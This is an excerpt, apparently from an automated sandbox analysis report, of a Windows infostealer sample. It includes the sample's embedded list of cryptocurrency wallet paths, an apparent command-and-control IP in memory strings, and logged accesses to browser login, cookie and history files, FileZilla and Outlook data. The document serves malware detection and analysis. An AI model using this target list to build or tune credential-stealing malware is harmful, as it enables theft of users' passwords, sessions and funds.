Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2450878675.0000000001B1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 81.77\Users\user\AppData\Roaming\Binance\.finger-print.fpon
Source: file.exe, 00000000.00000002.2450878675.0000000001B1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81\user\AppData\Roaming\Coinomi\Coinomi\wallets\*.*
Source: file.exe, 00000000.00000002.2450878675.0000000001B1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81\user\AppData\Roaming\MultiDoge\multidoge.walletH
Source: file.exe, 00000000.00000002.2450878675.0000000001B1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 9C680Q69ers\user\AppData\Roaming\Electrum-LTC\wallets\*.**O
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: Yara match File source: 00000000.00000002.2449562218.0000000000856000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3472, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 0.2.file.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.0244247334.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2449562218.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3054902462.0000000000721000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3055852446.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2450878675.0000000001AE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0244247334.exe PID: 4320, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.file.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.0244247334.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2449562218.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3054902462.0000000000721000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3472, type: MEMORYSTR